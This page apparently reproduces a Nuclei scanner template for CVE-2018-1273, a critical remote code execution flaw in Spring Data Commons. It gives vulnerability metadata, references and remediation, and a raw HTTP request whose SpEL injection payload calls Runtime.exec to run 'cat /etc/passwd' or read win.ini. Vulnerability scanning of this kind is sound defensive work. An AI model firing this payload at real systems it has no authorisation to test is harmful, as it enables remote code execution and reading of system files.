Skip to content

Spring Data Commons - Remote Code Execution

ID: CVE-2018-1273

Severity: critical

Author: dwisiswant0

Tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software

Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,and older unsupported versions, contain a property binder vulnerabilitycaused by improper neutralization of special elements.An unauthenticated remote malicious user (or attacker) can supplyspecially crafted request parameters against Spring Data REST backed HTTP resourcesor using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack.

id: CVE-2018-1273
info:
name: Spring Data Commons - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
and older unsupported versions, contain a property binder vulnerability
caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-1273
- https://pivotal.io/security/cve-2018-1273
- http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://github.com/2lambda123/SBSCAN
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-1273
cwe-id: CWE-20,CWE-94
epss-score: 0.97466
epss-percentile: 0.99962
cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: pivotal_software
product: spring_data_commons
tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software
http:
- raw:
- |
POST /account HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: application/x-www-form-urlencoded
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}
payloads:
command:
- "cat /etc/passwd"
- "type C:\\/Windows\\/win.ini"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
# digest: 4a0a00473045022100c4065f46343703b9cb89eed730435070ad8ff67fa9ab9de647014a31af9b928202204f34e2caf49c2858f15d85a5ecd599c06f7690d01fc3ad641d6d59590ff14705:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-1273.yaml"

View on Github